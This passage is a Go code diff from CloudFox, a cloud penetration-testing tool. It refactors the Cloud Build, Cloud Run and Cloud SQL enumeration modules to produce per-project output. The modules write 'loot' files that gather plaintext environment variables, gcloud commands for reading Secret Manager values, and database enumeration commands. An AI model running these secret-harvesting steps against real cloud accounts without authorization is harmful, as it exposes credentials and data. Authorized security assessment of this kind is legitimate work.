logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + } +} + +func (m *CloudBuildModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + var tables []internal.TableFile - if len(triggersBody) > 0 { + if len(allTriggers) > 0 { tables = append(tables, internal.TableFile{ Name: "cloudbuild-triggers", - Header: triggersHeader, - Body: triggersBody, + Header: m.getTriggersHeader(), + Body: m.triggersToTableBody(allTriggers), }) } - if len(buildsBody) > 0 { + if len(allBuilds) > 0 { tables = append(tables, internal.TableFile{ Name: "cloudbuild-builds", - Header: buildsHeader, - Body: buildsBody, + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(allBuilds), }) } - if privescCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := CloudBuildOutput{ diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 737c7480..1f0cb7e1 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -48,10 +48,12 @@ Attack Surface: type CloudRunModule struct { gcpinternal.BaseGCPModule - Services []CloudRunService.ServiceInfo - Jobs []CloudRunService.JobInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectServices map[string][]CloudRunService.ServiceInfo // projectID -> services + ProjectJobs map[string][]CloudRunService.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -75,13 +77,12 @@ func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { } module := &CloudRunModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Services: []CloudRunService.ServiceInfo{}, - Jobs: []CloudRunService.JobInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServices: make(map[string][]CloudRunService.ServiceInfo), + ProjectJobs: make(map[string][]CloudRunService.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -89,9 +90,15 @@ func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) - totalResources := len(m.Services) + len(m.Jobs) + // Get all resources for stats + allServices := m.getAllServices() + allJobs := m.getAllJobs() + totalResources := len(allServices) + len(allJobs) if totalResources == 0 { logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) return @@ -99,21 +106,39 @@ func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { // Count public services publicCount := 0 - for _, svc := range m.Services { + for _, svc := range allServices { if svc.IsPublic { publicCount++ } } if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(m.Services), len(m.Jobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(allServices), len(allJobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(m.Services), len(m.Jobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(allServices), len(allJobs)), globals.GCP_CLOUDRUN_MODULE_NAME) } m.writeOutput(ctx, logger) } +// getAllServices returns all services from all projects (for statistics) +func (m *CloudRunModule) getAllServices() []CloudRunService.ServiceInfo { + var all []CloudRunService.ServiceInfo + for _, services := range m.ProjectServices { + all = append(all, services...) + } + return all +} + +// getAllJobs returns all jobs from all projects (for statistics) +func (m *CloudRunModule) getAllJobs() []CloudRunService.JobInfo { + var all []CloudRunService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -124,6 +149,25 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l cs := CloudRunService.New() + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["cloudrun-env-vars"] = &internal.LootFile{ + Name: "cloudrun-env-vars", + Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", + } + m.LootMap[projectID]["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", + } + } + m.mu.Unlock() + // Get services services, err := cs.Services(projectID) if err != nil { @@ -132,9 +176,9 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) } else { m.mu.Lock() - m.Services = append(m.Services, services...) + m.ProjectServices[projectID] = services for _, svc := range services { - m.addServiceToLoot(svc) + m.addServiceToLoot(projectID, svc) } m.mu.Unlock() } @@ -147,9 +191,9 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) } else { m.mu.Lock() - m.Jobs = append(m.Jobs, jobs...) + m.ProjectJobs[projectID] = jobs for _, job := range jobs { - m.addJobToLoot(job) + m.addJobToLoot(projectID, job) } m.mu.Unlock() } @@ -162,24 +206,17 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l // ------------------------------ // Loot File Management // ------------------------------ -func (m *CloudRunModule) initializeLootFiles() { - m.LootMap["cloudrun-commands"] = &internal.LootFile{ - Name: "cloudrun-commands", - Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["cloudrun-env-vars"] = &internal.LootFile{ - Name: "cloudrun-env-vars", - Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", - } - m.LootMap["cloudrun-secret-refs"] = &internal.LootFile{ - Name: "cloudrun-secret-refs", - Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", +func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService.ServiceInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + envVarsLoot := m.LootMap[projectID]["cloudrun-env-vars"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return } -} -func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { // All commands for this service - m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "## Service: %s (Project: %s, Region: %s)\n"+ "# Image: %s\n"+ "# Service Account: %s\n"+ @@ -211,41 +248,49 @@ func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { ) // Add environment variables to loot - if len(svc.EnvVars) > 0 { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + if len(svc.EnvVars) > 0 && envVarsLoot != nil { + envVarsLoot.Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) for _, env := range svc.EnvVars { if env.Source == "direct" { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + envVarsLoot.Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) } else { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + envVarsLoot.Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) } } - m.LootMap["cloudrun-env-vars"].Contents += "\n" + envVarsLoot.Contents += "\n" } // Add secret references to loot - if len(svc.SecretRefs) > 0 { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + if len(svc.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) for _, ref := range svc.SecretRefs { if ref.Type == "env" { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + secretRefsLoot.Contents += fmt.Sprintf( "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, ) } else { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + secretRefsLoot.Contents += fmt.Sprintf( "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", ref.MountPath, ref.SecretName, svc.ProjectID, ) } } - m.LootMap["cloudrun-secret-refs"].Contents += "\n" + secretRefsLoot.Contents += "\n" } } -func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { +func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + envVarsLoot := m.LootMap[projectID]["cloudrun-env-vars"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return + } + // All commands for this job - m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "## Job: %s (Project: %s, Region: %s)\n"+ "# Image: %s\n"+ "# Service Account: %s\n\n"+ @@ -267,35 +312,35 @@ func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { ) // Add environment variables to loot - if len(job.EnvVars) > 0 { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + if len(job.EnvVars) > 0 && envVarsLoot != nil { + envVarsLoot.Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) for _, env := range job.EnvVars { if env.Source == "direct" { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + envVarsLoot.Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) } else { - m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + envVarsLoot.Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) } } - m.LootMap["cloudrun-env-vars"].Contents += "\n" + envVarsLoot.Contents += "\n" } // Add secret references to loot - if len(job.SecretRefs) > 0 { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + if len(job.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) for _, ref := range job.SecretRefs { if ref.Type == "env" { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + secretRefsLoot.Contents += fmt.Sprintf( "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, ) } else { - m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + secretRefsLoot.Contents += fmt.Sprintf( "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", ref.MountPath, ref.SecretName, job.ProjectID, ) } } - m.LootMap["cloudrun-secret-refs"].Contents += "\n" + secretRefsLoot.Contents += "\n" } } @@ -303,47 +348,146 @@ func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { // Output Generation // ------------------------------ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudRunModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectServices { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectJobs { + projectsWithData[projectID] = true + } + + // Build project-level outputs + for projectID := range projectsWithData { + services := m.ProjectServices[projectID] + jobs := m.ProjectJobs[projectID] + + tables := m.buildTablesForProject(projectID, services, jobs) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudRunOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudRunModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allServices := m.getAllServices() + allJobs := m.getAllJobs() + + tables := m.buildTablesForProject("", allServices, allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := CloudRunOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isCloudRunEmptyLoot checks if a loot file contains only the header +func isCloudRunEmptyLoot(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Generated by CloudFox\n\n") || + strings.HasSuffix(contents, "# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n") +} + +// buildTablesForProject builds all tables for a given project's services and jobs +func (m *CloudRunModule) buildTablesForProject(projectID string, services []CloudRunService.ServiceInfo, jobs []CloudRunService.JobInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + // Services table servicesHeader := []string{ - "Project ID", - "Project Name", - "Name", - "Region", - "URL", - "Ingress", - "Public", - "Invokers", - "Service Account", - "Default SA", - "Image", - "VPC Access", - "Min/Max", - "Env Vars", - "Secrets", - "Hardcoded", + "Project ID", "Project Name", "Name", "Region", "URL", "Ingress", "Public", + "Invokers", "Service Account", "Priv Esc", "Default SA", "Image", "VPC Access", + "Min/Max", "Env Vars", "Secrets", "Hardcoded", } var servicesBody [][]string - for _, svc := range m.Services { - // Format public status + for _, svc := range services { publicStatus := "No" if svc.IsPublic { publicStatus = "Yes" } - - // Format default SA status defaultSA := "No" if svc.UsesDefaultSA { defaultSA = "Yes" } - - // Format invokers invokers := "-" if len(svc.InvokerMembers) > 0 { invokers = strings.Join(svc.InvokerMembers, ", ") } - - // Format VPC access vpcAccess := "-" if svc.VPCAccess != "" { vpcAccess = extractName(svc.VPCAccess) @@ -351,188 +495,127 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) } } - - // Format scaling scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) - - // Format env var count envVars := "-" if svc.EnvVarCount > 0 { envVars = fmt.Sprintf("%d", svc.EnvVarCount) } - - // Format secrets count (Secret Manager references) secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount secrets := "-" if secretCount > 0 { secrets = fmt.Sprintf("%d", secretCount) } - - // Format hardcoded secrets count hardcoded := "No" if len(svc.HardcodedSecrets) > 0 { hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if svc.ServiceAccount != "" { + privEsc = m.PrivescCache.GetPrivescSummary(svc.ServiceAccount) + } else { + privEsc = "No" + } + } + servicesBody = append(servicesBody, []string{ - svc.ProjectID, - m.GetProjectName(svc.ProjectID), - svc.Name, - svc.Region, - svc.URL, - formatIngress(svc.IngressSettings), - publicStatus, - invokers, - svc.ServiceAccount, - defaultSA, - svc.ContainerImage, - vpcAccess, - scaling, - envVars, - secrets, - hardcoded, + svc.ProjectID, m.GetProjectName(svc.ProjectID), svc.Name, svc.Region, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, invokers, svc.ServiceAccount, + privEsc, defaultSA, svc.ContainerImage, vpcAccess, scaling, envVars, secrets, hardcoded, + }) + } + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, }) } // Jobs table jobsHeader := []string{ - "Project ID", - "Project Name", - "Name", - "Region", - "Service Account", - "Default SA", - "Image", - "Tasks", - "Parallelism", - "Last Execution", - "Env Vars", - "Secrets", - "Hardcoded", + "Project ID", "Project Name", "Name", "Region", "Service Account", "Priv Esc", "Default SA", + "Image", "Tasks", "Parallelism", "Last Execution", "Env Vars", "Secrets", "Hardcoded", } var jobsBody [][]string - for _, job := range m.Jobs { - // Format default SA status + for _, job := range jobs { defaultSA := "No" if job.UsesDefaultSA { defaultSA = "Yes" } - - // Format env var count envVars := "-" if job.EnvVarCount > 0 { envVars = fmt.Sprintf("%d", job.EnvVarCount) } - - // Format secrets count secretCount := job.SecretEnvVarCount + job.SecretVolumeCount secrets := "-" if secretCount > 0 { secrets = fmt.Sprintf("%d", secretCount) } - - // Format hardcoded secrets count hardcoded := "No" if len(job.HardcodedSecrets) > 0 { hardcoded = fmt.Sprintf("Yes (%d)", len(job.HardcodedSecrets)) } - - // Format last execution lastExec := "-" if job.LastExecution != "" { lastExec = extractName(job.LastExecution) } + // Check privesc for the service account + jobPrivEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if job.ServiceAccount != "" { + jobPrivEsc = m.PrivescCache.GetPrivescSummary(job.ServiceAccount) + } else { + jobPrivEsc = "No" + } + } + jobsBody = append(jobsBody, []string{ - job.ProjectID, - m.GetProjectName(job.ProjectID), - job.Name, - job.Region, - job.ServiceAccount, - defaultSA, - job.ContainerImage, - fmt.Sprintf("%d", job.TaskCount), - fmt.Sprintf("%d", job.Parallelism), - lastExec, - envVars, - secrets, - hardcoded, + job.ProjectID, m.GetProjectName(job.ProjectID), job.Name, job.Region, + job.ServiceAccount, jobPrivEsc, defaultSA, job.ContainerImage, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, envVars, secrets, hardcoded, + }) + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, }) } // Hardcoded secrets table secretsHeader := []string{ - "Project ID", - "Project Name", - "Resource Type", - "Name", - "Region", - "Env Var", - "Secret Type", + "Project ID", "Project Name", "Resource Type", "Name", "Region", "Env Var", "Secret Type", } var secretsBody [][]string - // Add service secrets - for _, svc := range m.Services { + for _, svc := range services { for _, secret := range svc.HardcodedSecrets { secretsBody = append(secretsBody, []string{ - svc.ProjectID, - m.GetProjectName(svc.ProjectID), - "Service", - svc.Name, - svc.Region, - secret.EnvVarName, - secret.SecretType, + svc.ProjectID, m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, secret.EnvVarName, secret.SecretType, }) - // Add remediation to loot m.addSecretRemediationToLoot(svc.Name, svc.ProjectID, svc.Region, secret.EnvVarName, "service") } } - // Add job secrets - for _, job := range m.Jobs { + for _, job := range jobs { for _, secret := range job.HardcodedSecrets { secretsBody = append(secretsBody, []string{ - job.ProjectID, - m.GetProjectName(job.ProjectID), - "Job", - job.Name, - job.Region, - secret.EnvVarName, - secret.SecretType, + job.ProjectID, m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, secret.EnvVarName, secret.SecretType, }) - // Add remediation to loot m.addSecretRemediationToLoot(job.Name, job.ProjectID, job.Region, secret.EnvVarName, "job") } } - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{} - - if len(servicesBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", - Header: servicesHeader, - Body: servicesBody, - }) - } - - if len(jobsBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", - Header: jobsHeader, - Body: jobsBody, - }) - } - if len(secretsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", @@ -541,32 +624,7 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger }) } - output := CloudRunOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) - m.CommandCounter.Error++ - } + return tableFiles } // Helper functions @@ -601,7 +659,12 @@ func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, reg m.mu.Lock() defer m.mu.Unlock() - m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + if commandsLoot == nil { + return + } + + commandsLoot.Contents += fmt.Sprintf( "# CRITICAL: Migrate hardcoded secret %s from %s %s\n"+ "# 1. Create secret in Secret Manager:\n"+ "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=- --project=%s\n"+ @@ -613,13 +676,13 @@ func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, reg ) if resourceType == "service" { - m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "# 3. Update Cloud Run service to use secret:\n"+ "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", resourceName, envVarName, secretName, region, projectID, ) } else { - m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "# 3. Update Cloud Run job to use secret:\n"+ "gcloud run jobs update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", resourceName, envVarName, secretName, region, projectID, diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index 68861c87..5e8009fc 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -61,9 +61,10 @@ Attack Surface: type CloudSQLModule struct { gcpinternal.BaseGCPModule - Instances []CloudSQLService.SQLInstanceInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]CloudSQLService.SQLInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -87,12 +88,11 @@ func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { } module := &CloudSQLModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []CloudSQLService.SQLInstanceInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]CloudSQLService.SQLInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -102,28 +102,39 @@ func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) - if len(m.Instances) == 0 { + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) return } // Count public instances publicCount := 0 - for _, instance := range m.Instances { + for _, instance := range allInstances { if instance.HasPublicIP { publicCount++ } } if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(m.Instances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(allInstances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_CLOUDSQL_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_CLOUDSQL_MODULE_NAME) } m.writeOutput(ctx, logger) } +// getAllInstances returns all instances from all projects (for statistics) +func (m *CloudSQLModule) getAllInstances() []CloudSQLService.SQLInstanceInfo { + var all []CloudSQLService.SQLInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -141,11 +152,21 @@ func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, l return } + // Thread-safe store per-project m.mu.Lock() - m.Instances = append(m.Instances, instances...) + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", + } + } for _, instance := range instances { - m.addInstanceToLoot(instance) + m.addInstanceToLoot(projectID, instance) } m.mu.Unlock() @@ -157,14 +178,12 @@ func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, l // ------------------------------ // Loot File Management // ------------------------------ -func (m *CloudSQLModule) initializeLootFiles() { - m.LootMap["cloudsql-commands"] = &internal.LootFile{ - Name: "cloudsql-commands", - Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", +func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLService.SQLInstanceInfo) { + lootFile := m.LootMap[projectID]["cloudsql-commands"] + if lootFile == nil { + return } -} -func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { dbType := getDatabaseType(instance.DatabaseVersion) connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) @@ -173,7 +192,7 @@ func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceI publicIP = "-" } - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (%s)\n"+ "# Project: %s | Region: %s\n"+ "# Public IP: %s\n", @@ -183,7 +202,7 @@ func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceI ) // gcloud commands - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud sql instances describe %s --project=%s\n"+ "gcloud sql databases list --instance=%s --project=%s\n"+ "gcloud sql users list --instance=%s --project=%s\n", @@ -196,40 +215,40 @@ func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceI switch dbType { case "mysql": 